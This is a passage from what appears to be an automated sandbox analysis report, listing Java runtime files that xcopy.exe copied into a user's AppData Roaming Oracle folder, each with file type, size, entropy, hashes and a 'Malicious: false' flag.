SHA-512:	AF887EFEF9AADAB6E57B2A64F749B26CF8DE0AB6122A4AE812CBFBBCBCDB0BDB75A33B6784C09FF37DFC674912E7683D35C79E0AF4D8AA69C1CF59709D527429
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	15784
Entropy (8bit):	6.445802850717002
Encrypted:	false
MD5:	E2E61790688574F5F058AD01145E0473
SHA1:	F390689848499DCFCBD62F73CCD75EB5AFE8F073
SHA-256:	29DD805EA0C9D04140F38D6CDA498ED551E43409904247F38029EA11C33BD42D
SHA-512:	3A6C9C6AA270CD0CDD2BEDBC548B393C7E689D0AD490321DB4C1D7A006ACBC2339417E4C74EB03D22F41B7722464DBD99EDA7F73C76DCD356545B57D053D6CBF
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	16296
Entropy (8bit):	6.48879653176865
Encrypted:	false
MD5:	EF59DABB7C9789B9335841A595748C0B
SHA1:	DB9DE055F6FC153269C3BFE38A1EBE16741A2651
SHA-256:	BD66D5691F6CCF8D420F7504C51407F4B417E6CB4C3D80F5DF998CBCBE6349A3
SHA-512:	3F8AC9FDA94739BF1883F4B0A110E86085ED2C09D6662ECDBAF65E769F1C35B4E3960BE8B78FF2ECB946B53AE7159120F2DA3112FDEA35D42DABAD644710C646
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	16296
Entropy (8bit):	6.485399971696596
Encrypted:	false
MD5:	C96C6041829212284EFB5A85B08B1536
SHA1:	66FE308132292104AB8E6A1DB6E901B25F7EAB96
SHA-256:	38185AA07205AEB86BC1B40BD1B27AF6D2FEE122FAFBD717D314EE4FB4CB46B3
SHA-512:	4D46DBDADF47F1F2B093E1190A3021FE50B5B785DCB623F9E405C2D3FF5AB42B5CB94D78C2D6274C508152AF08AAB7F82617AF3117897A4DD219DFA9E4907508
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	197544
Entropy (8bit):	6.888583959722043
Encrypted:	false
MD5:	C342CDA766E9C33E0B2C5B9641C1DD96
SHA1:	413E53FEF148FD019C44AAE839BAEDEFCBF99D82
SHA-256:	64296C35F7807902C6DD95B80934EE5EC0F806C343DEE50FC3684C1C563BDBBB
SHA-512:	5C8257577BE801B8F5BEE5AF3F931461C16507595BD7C46FBF3F422B7C7B898BC0A7901C9D7CD20434F2938C43CD46ADF0636835293A0DCE90B43EE212C069AF
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	460712
Entropy (8bit):	5.49742689900461
Encrypted:	false
MD5:	0BED6740A90593C4894EBAF1E7AAFF27
SHA1:	C492A9190206361C9AE08D57735DCBFA27570338
SHA-256:	FF2BADDC693BE39FB5835E99962AB4B28F87AB046745A17C08B70F3F424EA769
SHA-512:	17CAA60ADF9471D577644268B04753385336535B42E75337D4A1E1D70B22391C2EED0715AB4EA6E22FC50C807A21C4F265C4A29C8018B2B4B6820D0F4EE6071C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):	51112
Entropy (8bit):	6.345067264499535
Encrypted:	false
MD5:	CE2F700CA51229054C9A03D96646DE51
SHA1:	8C559BBEE396FB62216D0574AE3C915290099CEE
SHA-256:	35A3A596B821506207BF170A72674E1E133987BCC75B33AB3CABBC3DF31E9D0C
SHA-512:	06F869DA8A81EB8BD5372AF62ABAC7527F9487C765449D0B5FA9CB2F323389374434E63E327F2776E6A82D04AB8E490A639B85DB7C86747509AD46B006E4ABB7
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	123816
Entropy (8bit):	6.7248235819832605
Encrypted:	false
MD5:	80779B5E8A5B50B7F8129CA5161998B6
SHA1:	F1FE24C203F2BE499EFF09970B52AF5A75E3066C
SHA-256:	8E48D605AD36F69EB81219CC7C2F43B87C6D72478F8F0C7BCA2361394B185465
SHA-512:	978B153AADD8482B319B79379B47F05EA758083256BCFB904856067B98A5CAD207A85965714C37B505F92247B16EC53783AD23433CB1DCB4446D2F02400076EB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	26024
Entropy (8bit):	6.491585002236819
Encrypted:	false
MD5:	869830F45A1974B52C1115C04AECBDB9
SHA1:	68C4A4D8236CE2D44C9EF90E78359420E5DFCCC9
SHA-256:	DB964C5FA792CA85229B33D2E9F1FF9564CC8D934A919CA0756E089E2D5CF0B4
SHA-512:	E740837854BE52B7B6F0553B174AA658038DE8F69E9B0A4492CC5BBC420FD0E342152B2186AD7EFDC422FDA298715E13A088A74F14B7235FDD5CCA987C51693C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	193448
Entropy (8bit):	6.803608525717416
Encrypted:	false
MD5:	DD48F24A0EDA115AFF6522C96DB7D5C4
SHA1:	07F1F15B9F2EADCEEA4E317DEB5E15B3213815D2
SHA-256:	1E64B50C41162D7E92EBF2090608D2E65DD2F4055ACEFCC6D8F78F8CAACEE3F2
SHA-512:	AB2E32392BD8B8A11ED7D1C80B1357BB831A09A26F5AB0341CCCB0F5AC894FCAC3C56F0CF6EA7CF494708C491DB7A6F90A8824084560FB0385F2402985C47AEB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	16296
Entropy (8bit):	6.365142524949487
Encrypted:	false
MD5:	5D5801D096F9F362F442673632013727
SHA1:	EA7AA57348BAA11475CC84C7FD093EDC6EF7F4C1
SHA-256:	2A18E6EC7AE78FB09F888CA4EDB5109BF5FDAF9456A10DB876F9F9113318B1D6
SHA-512:	30D7064CA07ACB4CE097D46B75B732DF719C264FE7625DA737C42A7AC1929E88AD0ED02F7AD1A0DAA74373654387CC07F49DA57F0410F65153F8D49DEE736F48
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	65960
Entropy (8bit):	6.465536978061415
Encrypted:	false
MD5:	924E224DEA41543F9721733C7D7413E2
SHA1:	BC5B5A9A9133D6E1A32D47CED7749763DD8578F7
SHA-256:	43F54FB72BA9998D56DD10414B0C9F62C326CF0AA46924BC09BACC70251841D4
SHA-512:	CDDDF3EA04FB0CBBF4840672FC00EBE90DD5B119E9B6BFDECF1348A945155D589E8FD9312996FC5287C8729E4AD5E6B1F03F6D490B4479E1CA829C7309506B38
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):	159656
Entropy (8bit):	6.025752408318829
Encrypted:	false
MD5:	32F50E7E4D45A38E60EA7D6D701A08C9
SHA1:	4E9B5A922051CF2B98AFA1E9DE8B7CD40D135DA5
SHA-256:	36D5D1B1D3FDB383C02B09232E91026E95D61F05BD8B80E19622323B47568FC9
SHA-512:	0AA3360D5BD597EDD1E6C37B096ABC39868B5AC2EE754FC26C6FA26AD1F594D3D13B4BF4ECEADB807E4CFF0E347B66DF9635639DBE24DC7AF15DBC31DCE03FB6
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	39848
Entropy (8bit):	6.747726810732676
Encrypted:	false
MD5:	CC381E7FC86BF787CCD68F2BCEB2FADE
SHA1:	7CD90546B673EE77678FAF826C79272B00A16424
SHA-256:	2981277A36B0B0C561668C0469ED53EA53E9984DE90149BAEFACE690A19D53A0
SHA-512:	2428129705A4DDCCAA17B97508295C3C820208F52B9A8D19743BDE65CCEFAA30222B2482638C08329C992C63FE82217A65F75E02F5673401A214D46DB6D67CA9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	21928
Entropy (8bit):	6.496525091479298
Encrypted:	false
MD5:	33FE0ED8E5500FA8E3A1076C65F16277
SHA1:	1D8B80C136BDEF6EA11EFE5191BB1E78006D2E1D
SHA-256:	5D3FA20FE6E54F5C25CE3657B22E5124D764BF07545A801EDDE3DAE3A927E62E
SHA-512:	5634ACAD735C676012A774799DEF3D7FB4641AF9C1F0729BED1C971A3E717E544F3F2939203EDCCA7E5DA4910A3BB1D73ED1653A3AB3718514E868B0CD9E86DB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	163240
Entropy (8bit):	6.497453343257595
Encrypted:	false
MD5:	15F175F9D7AD2230B782D4249DDE7E6D
SHA1:	71C733A0D4D635BD94D43E4A4F39F8EEA6CE47A5
SHA-256:	9B993F428A3B1B5EC26626C0B21BF055248B12A9BB77C5E484EB5C7EBA1AE8C6
SHA-512:	33FF47301B7F55F2ED68281A330AA433EEAE95AD9E0A546B43235816B1E568B50A33D8C66407C51B0CC9D2661D5A569EA2204A23384F08DA2C478C40B7EE9D7F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Size (bytes):	69032
Entropy (8bit):	6.939388185033945
Encrypted:	false
MD5:	529EC9FA13D32B225C9C402D104A22AE
SHA1:	8F07321FDDF0FF6A9CE9B9135FCEF61A56C6328F
SHA-256:	C6BA7140F85BEDBB79D40C2F0B7F8A5E5E447BCF0816C5FB365EA0088FFD17EE
SHA-512:	6B89C23C044A811E036AA20318D3A4A2A73B1FB2D627F64087AB18F548AABDA8F108077370E4D8E88CC4F1E7BB78C38DDA48F2DFEC3DE24DA58F811A1567CA50
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\accessibility.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	155
Entropy (8bit):	4.61826726855829
Encrypted:	false
MD5:	9E5E954BC0E625A69A0A430E80DCF724
SHA1:	C29C1F37A2148B50A343DB1A4AA9EB0512F80749
SHA-256:	A46372B05CE9F40F5D5A775C90D7AA60687CD91AAA7374C499F0221229BF344E
SHA-512:	18A8277A872FB9E070A1980EEE3DDD096ED0BBA755DB9B57409983C1D5A860E9CBD3B67E66FF47852FE12324B84D4984E2F13859F65FABE2FF175725898F1B67
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\calendars.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	1378
Entropy (8bit):	5.180680535922269
Encrypted:	false
MD5:	40A6F317D17705B4D0241F4EBB45962D
SHA1:	42EBB0988124433B8F2A6E5D9A74ED41240BCFC6
SHA-256:	D93FB6D3451D1B82256B0E31AAE7850152FA5DF76F116A9D669AA4ACE6BB68B4
SHA-512:	E4C95F8F1354833F440672C0761CE1B4895DAA52E7F143A110533F978CC6C094847AEB66636EFA6DE74B0E900FBBE79A3CC21280C4063627CE8D259068084A3A
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\charsets.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	3035005
Entropy (8bit):	6.60778668753685
Encrypted:	false
MD5:	AD79C31213B45E9B8693F44173EC7F4E
SHA1:	68B11974C17E83E3A782B7CDF1FB881EFA9DB4D7
SHA-256:	69EDB0A20AB9005D00C5BDD0572183D3CDEAD31D8A43BF27F494440679AE046B
SHA-512:	C6D9BA45EE33A7BB045660A390E33080BDCE1A8014EB3502A49612C41040D51DC30A231D17A6E43093F08F45EBFCCFCE56DD355F8A51E98D4E13348E93A41EDC
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\classlist
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with CRLF line terminators
Size (bytes):	80761
Entropy (8bit):	4.928854881958133
Encrypted:	false
MD5:	51531CBBE256939E7AB12FCC256FBF3A
SHA1:	5754126190F818B7D39D5B725A1878FB33233D26
SHA-256:	406B68D923E9CE01F19194BCA03EAAF9FC0EFCE6590713B6D066485CD94D1339
SHA-512:	DAE90C8F429BFC7782BED9116B6A3B30110CE2B2DA865F63FEFDBD6BE965284C7D90FF8EBF869481E01246D35264110A3D8690B397CB1A109FAF61D2F937BCC2
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\CIEXYZ.pf
Process:	C:\Windows\System32\xcopy.exe
File Type:	Sun KCMS ICC Profile
Size (bytes):	51236
Entropy (8bit):	7.226972359973779
Encrypted:	false
MD5:	10F23396E21454E6BDFB0DB2D124DB85
SHA1:	B7779924C70554647B87C2A86159CA7781E929F8
SHA-256:	207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
SHA-512:	F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\GRAY.pf
Process:	C:\Windows\System32\xcopy.exe
File Type:	Sun KCMS ICC Profile
Size (bytes):	632
Entropy (8bit):	3.7843698642539247
Encrypted:	false
MD5:	1002F18FC4916F83E0FC7E33DCC1FA09
SHA1:	27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
SHA-256:	081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
SHA-512:	334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\LINEAR_RGB.pf
Process:	C:\Windows\System32\xcopy.exe
File Type:	ICC Profile
Size (bytes):	1044
Entropy (8bit):	6.510788634170065
Encrypted:	false
MD5:	A387B65159C9887265BABDEF9CA8DAE5
SHA1:	7913274C2F73BAFCF888F09FF60990B100214EDE
SHA-256:	712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
SHA-512:	359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\PYCC.pf
Process:	C:\Windows\System32\xcopy.exe
File Type:	Sun KCMS ICC Profile
Size (bytes):	274474
Entropy (8bit):	7.84329081962271
Encrypted:	false
MD5:	24B9DEE2469F9CC8EC39D5BDB3901500
SHA1:	4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
SHA-256:	48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
SHA-512:	D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\cmm\sRGB.pf
Process:	C:\Windows\System32\xcopy.exe
File Type:	Microsoft ICM Color Profile
Size (bytes):	3144
Entropy (8bit):	7.02686707094517
Encrypted:	false
MD5:	1D3FDA2EDB4A89AB60A23C5F7C7D81DD
SHA1:	9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
SHA-256:	2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
SHA-512:	16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\content-types.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	5548
Entropy (8bit):	5.037985807321916
Encrypted:	false
MD5:	F507712B379FDC5A8D539811FAF51D02
SHA1:	82BB25303CF6835AC4B076575F27E8486DAB9511
SHA-256:	46F47B3883C7244A819AE1161113FE9D2375F881B75C9B3012D7A6B3497E030A
SHA-512:	CB3C99883336D04C42CEA9C2401E81140ECBB7FC5B8EF3301B13268A45C1AC93FD62176AB8270B91528AC8E938C7C90CC9663D8598E224794354546139965DFE
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\currency.data
Process:	C:\Windows\System32\xcopy.exe
File Type:	data
Size (bytes):	4074
Entropy (8bit):	3.10684493815346
Encrypted:	false
MD5:	D072FB69E4C180D6704A9DA8FF64772E
SHA1:	66E52DAA2EEE4F81644816B64289C459BD009400
SHA-256:	5A55DBB9F6DD2BD6024E9F9E81B26D7FA72E74C13A0E8B0A7D5C4715A08C5739
SHA-512:	2D152A5A475878850BD3CC28D032D19624FF1ADE99465BF975BBCFFC548006E9FB60971BA416F2E623750ACF9DC266AA4B0C3A2A2761F63C00FCAEF3181E9991
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	4795777
Entropy (8bit):	6.56263259560607
Encrypted:	false
MD5:	CC16C11DBF0250885C63C58884789180
SHA1:	ECDA995FF21BA26037B236D52ED47D7151636E81
SHA-256:	1C6A481862C70D2DEF4C552B979335F2A94EA6976419D182A6937EBD7736BAAB
SHA-512:	0661EB932F34DF0308598A4EB10B808AD959E7992C82A805945313D695E5B596295281D6B08FB6E16C1C865339CA4D516DF3474E335FA1B27F2FCEDEB69F0462
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\ffjcext.zip
Process:	C:\Windows\System32\xcopy.exe
File Type:	Zip archive data, at least v1.0 to extract
Size (bytes):	14130
Entropy (8bit):	5.625348209304913
Encrypted:	false
MD5:	0A513FB75ADF2580D0F0D55D0A245C4F
SHA1:	E60C9E152965AAEC3ACA55985AC0814C3AA20E3D
SHA-256:	9EF3FC91C2DBE1E4E3C73CA1D369AC771B0A876A2312BDCDF940DE6E5331D243
SHA-512:	2C86EA09C3C6C67CECE8482CA6002BE8C6013849A4C4CD40C1B0B0B2A48B44E5EC5C18FB69A748E37AF9ECC1DBB18C1AF3E2987E54EDA3F86C23F68E071CD0C5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text
Size (bytes):	2860
Entropy (8bit):	4.793521742012267
Encrypted:	false
MD5:	811BAFA6F97801186910E9B1D9927FE2
SHA1:	DC52841C708E3C1EB2A044088A43396D1291BB5E
SHA-256:	926CCADAEC649F621590D1AA5E915481016564E7AB28390C8D68BDAAF4785F1F
SHA-512:	5AE9C27DCE552EA32603B2C87C1510858F86D9D10CADE691B2E54747C3602FE75DE032CF8917DCD4EE160EE4CC5BE2E708B321BB1D5CDEBFA9FE46C2F870CA7C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_de.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	3306
Entropy (8bit):	4.888605396125911
Encrypted:	false
MD5:	D77C3B5274B8161328AB5C78F66DD0D0
SHA1:	D989FE1B8F7904888D5102294EBEFD28D932ECDB
SHA-256:	C9399A33BB9C75345130B99D1D7CE886D9148F1936543587848C47B8540DA640
SHA-512:	696E28B6BC7E834C51AB9821D0D65D1A32F00EB15CAA732047B751288EA73D8D703D3152BF81F267147F8C1538E1BF470748DF41176392F10E622F4C7708DD92
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_es.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	3600
Entropy (8bit):	4.745461525350421
Encrypted:	false
MD5:	6D32848BD173B9444B71922616E0645E
SHA1:	1B0334B79DB481C3A59BE6915D5118D760C97BAA
SHA-256:	BE987D93E23AB7318DB095727DEDD8461BA6D98B9409EF8FC7F5C79FA9666B84
SHA-512:	8E9E92D3229FF80761010E4878B4A33BFB9F0BD053040FE152565CFB2819467E9A92609B3786F9BDBF0D7934CF3C7D20BC3369FE1AD7D0DF7FADF561C3FDCA3C
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_fr.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	3409
Entropy (8bit):	4.800862996269612
Encrypted:	false
MD5:	C11AB66FEDE3042EE75DFD19032C8A72
SHA1:	69BD2D03C2064F8679DE5B4E430EA61B567C69C5
SHA-256:	8DEEEC35ED29348F5755801F42675E3BF3FA7AD4B1E414ACCA283C4DA40E4D77
SHA-512:	072F8923DF111F82F482D65651758B8B4BA2486CB0EA08FB8B113F472A42A1C3BCB00DAE7D1780CF371E2C2BD955D8B66658D5EE15E548B1EEA16B312FDCBDF9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_it.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	3223
Entropy (8bit):	4.671266438569993
Encrypted:	false
MD5:	A81C4B0F3BF9A499429E14A881010EF6
SHA1:	DBE49949308F28540A42AE6CD2AD58AFBF615592
SHA-256:	550954F1F80FE0E73D74EB10AD529B454D5EBC626EB94A6B294D7D2ACF06F372
SHA-512:	6FED61CBCD7FE82C15C9A312ACED9D93836EBCFFAF3E13543BC9DD8B4C88400C371D2365FEEE0F1BB844A6372D4128376568A5B6FE666FD6213636FCBD8C7791
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_ja.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	6349
Entropy (8bit):	4.575777726495054
Encrypted:	false
MD5:	B7279F1C3BA0B63806F37F6B9D33C314
SHA1:	751170A7CDEFCB1226604AC3F8196E06A04FD7AC
SHA-256:	8D499C1CB14D58E968A823E11D5B114408C010B053B3B38CFEF7EBF9FB49096F
SHA-512:	4A3BF898A36D55010C8A8F92E5A784516475BDFFFCD337D439D6DA251DDB97BCC7E26F104AC5602320019ED5C0B8DC8883B2581760AFEA9C59C74982574D164B
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_ko.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	5719
Entropy (8bit):	4.762656868505961
Encrypted:	false
MD5:	D52D6766CD66F3967127B219E776C7B1
SHA1:	E4C609B2B7C3860B9614D74244F141D0FBC43D48
SHA-256:	4DE0D5CEAF4EB8C8C657246CB91FF8DFD6903CDA274B8ED9EDA531BDD6D499EA
SHA-512:	5CBA8878DB7F83408668FA1F4FE78BF902F488F334404FD9E744FE5F26FD3DBEFA30116F4E211A10EC7CD49325DD27E8A2021AEA27603E46AACCD6D83F6C2084
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_pt_BR.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	3348
Entropy (8bit):	4.856353059177929
Encrypted:	false
MD5:	9BB1253A3F79152EA273CF6A52A18080
SHA1:	C1084130F767D3955DAC9C89C2CC67C59A9BBB8C
SHA-256:	40AEB9EB0AB79BE2D25764CBC16E5388A3BE12EBAF10E96837FEEECF44354948
SHA-512:	6396CBBE7672A7A2E7C3B7B64C150A13356C8EDDAC84B764789C1C421942F1BC5A166D635CE1DC122050BB8A9985BFDA96B25C2ADF52409AF981BD89FC4DB5C9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_sv.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	3409
Entropy (8bit):	4.897253332398416
Encrypted:	false
MD5:	A6005BE45C88900A15BC80D461B60C30
SHA1:	CA3E18B5AEA928A8465656C86970D9584D85EF7F
SHA-256:	5CCEE63720FCAC2A136CF1FA90CBAC05040F89FFE8C082C2D067247BFCD76B87
SHA-512:	9442FFB47BF0F158A44A81A16B2AB94BB36FAC2F75B0C9467654AB9A8DF26A63C0C7A7717DEAF5476068BC0A0D602B828CE1E8D229CBFAAF201C24C0F78BE1F9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_CN.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	4072
Entropy (8bit):	5.01527031899567
Encrypted:	false
MD5:	E6F84C081895ACDFD98DA0F496E1DD3D
SHA1:	1C2B96673DDDD3596890EF4FC22017D484A1F652
SHA-256:	A1752A0175F490F61E0AAD46DC6887C19711F078309062D5260E164AC844F61A
SHA-512:	D4D28780147E22678CD8E7415CACFAD533AE5AF31D74426BBE4993F05A0707E4F0F71D948093FFA1A0D6EA48310E901CD0ED1C14E2FBDF69C92462D070A9664F
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_HK.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	3752
Entropy (8bit):	5.149369030063069
Encrypted:	false
MD5:	880BAACB176553DEAB39EDBE4B74380D
SHA1:	37A57AAD121C14C25E149206179728FA62203BF0
SHA-256:	FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
SHA-512:	3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_TW.properties
Process:	C:\Windows\System32\xcopy.exe
File Type:	ASCII text, with very long lines
Size (bytes):	3752
Entropy (8bit):	5.149369030063069
Encrypted:	false
MD5:	880BAACB176553DEAB39EDBE4B74380D
SHA1:	37A57AAD121C14C25E149206179728FA62203BF0
SHA-256:	FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
SHA-512:	3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\splash.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 320 x 139
Size (bytes):	8590
Entropy (8bit):	7.91068877181633
Encrypted:	false
MD5:	249053609EAF5B17DDD42149FC24C469
SHA1:	20E7AEC75F6D036D504277542E507EB7DC24AAE8
SHA-256:	113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
SHA-512:	9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\deploy\splash@2x.gif
Process:	C:\Windows\System32\xcopy.exe
File Type:	GIF image data, version 89a, 640 x 278
Size (bytes):	15276
Entropy (8bit):	7.949850025334252
Encrypted:	false
MD5:	CB81FED291361D1DD745202659857B1B
SHA1:	0AE4A5BDA2A6D628FAC51462390B503C99509FDC
SHA-256:	9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
SHA-512:	4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\access-bridge.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	188274
Entropy (8bit):	7.794180337226393
Encrypted:	false
MD5:	C5C5D8091EB8B17BE27E67495CE21B60
SHA1:	4F937B199C9C0253CF6165D71365257832889AD6
SHA-256:	EFCABCC8B2D323B9B2C6131BFB8D661E6CF292024BC5007D9EBF373634459087
SHA-512:	4B65AD668184587ED6ADC7B4E12FD16D4C728D5C6A0B26319F9D6B016EA6E355DA11B3335160C575030F83595FBDD05AA874661E641E3BBFE9B5FCB6515A5A9E
Malicious:	false

C:\Users\user\AppData\Roaming\Oracle\lib\ext\cldrdata.jar
Process:	C:\Windows\System32\xcopy.exe
File Type:	Java Jar file data (zip)
Size (bytes):	3860522
Entropy (8bit):	7.966925970349688
Encrypted:	false
MD5:	2C821D026B8E545C3FC5DFC82B71988A
